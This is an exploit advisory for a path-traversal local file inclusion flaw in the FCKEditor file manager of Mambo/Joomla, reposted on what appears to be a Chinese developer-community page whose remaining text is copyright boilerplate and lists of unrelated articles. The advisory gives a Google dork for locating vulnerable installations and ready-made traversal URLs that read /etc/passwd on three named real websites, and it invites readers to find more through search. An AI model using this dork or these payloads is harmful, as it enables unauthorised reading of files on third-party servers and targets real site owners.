##################################################
mambo /joomla (fckeditor) lfi Vulnerability
##################################################
# Exploit Title :mambo /joomla (fckeditor) lfi Vulnerability
# Google Dork: /mambots/editors/fckeditor/editor/filemanager/browser/default
#Author: BHG Security Center
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/
# Tested on: [linux+apache]
# Finder(s):Siavash (morghabi_s@yahoo.com)
# Examle:
http://chaboille.voyageur.coop/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
http://council.mcsquaredllc.com/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
http://www.intexsac.com/espanol/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
and more in go0gle
##################################################
[-] Disclosure timeline:
[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure
# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t
~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf
===========================================[End]============================================= Mambo / Joomla FCKEditor Local File Inclusion
2012-09-23
905
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
##################################################mambo /joomla (fckeditor) lfi Vulnerability...
目录
相关文章
|
开发工具
git
报错解决:your local changes to the following files would be overwritten by merge: .idea/workspa
报错解决:your local changes to the following files would be overwritten by merge: .idea/workspa
360
0
0
|
关系型数据库
MySQL
应用服务中间件
linux篇-Parse error: syntax error, unexpected ‘new’ (T_NEW) in /usr/local/nginx/html/cacti/lib/adodb
linux篇-Parse error: syntax error, unexpected ‘new’ (T_NEW) in /usr/local/nginx/html/cacti/lib/adodb
134
0
0
|
PHP
关系型数据库
MySQL
|
PHP
数据库
缓存
wp-includes/load.php
725
0
0
|
PHP
数据库
自然语言处理
wordpress/wp-includes目录文件
1338
0
0
|
缓存
API
PHP
wp-setting.php文件详解
1370
0
0
|
开发工具
git
数据安全/隐私保护
warning: templates not found /usr/local/git/share/git-core/templates
今天在 Mac 上用 SourceTree 克隆 svn 的时候, 出现了 warning: templates not found /usr/local/Git/share/git-core/templates 警告,导致克隆失败.
2121
0
0
|
机器学习/深度学习
XML
数据格式
web开发1-fckeditor部署报错:The server didn't reply with a proper XML data.
在部署fckeditor的时候可能遇到各种各样的问题,很容易就在网上搜到答案的可能大家不会在乎,我遇到的纠结了很长时间在搞定,走了一些弯路。
先看看问题。部署好之后上传图片的时候浏览本地文件的时候出错。
845
0
0
|
Windows
安全
Ubuntu
热门文章
最新文章
1
随机生成UserAgent的python库(fake-useragent库)
2
使用zxing识别一幅包含多个二维码的图片
3
阿里云的SLB,植入cookie和重写cookie有什么区别?
4
基于Flink的实时日志分析系统实践
5
如何在服务器上跑python程序
6
电池技术多年没有较大发展,成为移动设备最大制约
7
Spread for WinRT 7新功能使用指南
8
codeforces Soldier and Number Game(dp+素数筛选)
9
九度oj-1001-Java
10
Android:随笔——对页面的View进行截图
1
分解商业周期时间序列:线性滤波器、HP滤波器、Baxter滤波器、Beveridge Nelson分解等去趋势2
9
2
分解商业周期时间序列:线性滤波器、HP滤波器、Baxter滤波器、Beveridge Nelson分解等去趋势法1
9
3
灰色关联分析(Grey Relation Analysis,GRA)中国经济社会发展指标
9
4
极值分析:分块极大值BLOCK-MAXIMA、阈值超额法、广义帕累托分布GPD拟合降雨数据时间序列
9
5
GARCH-DCC模型和DCC(MVT)建模估计
8
6
ARIMA、ARIMAX、 动态回归和OLS 回归预测多元时间序列
10
7
R语言预测期货波动率的实现:ARCH与HAR-RV与GARCH,ARFIMA模型比较
10
8
spss modeler用决策树神经网络预测ST的股票
9
9
K-means和层次聚类分析癌细胞系微阵列数据和树状图可视化比较
8
10
matlab中使用VMD(变分模态分解)对信号去噪
8
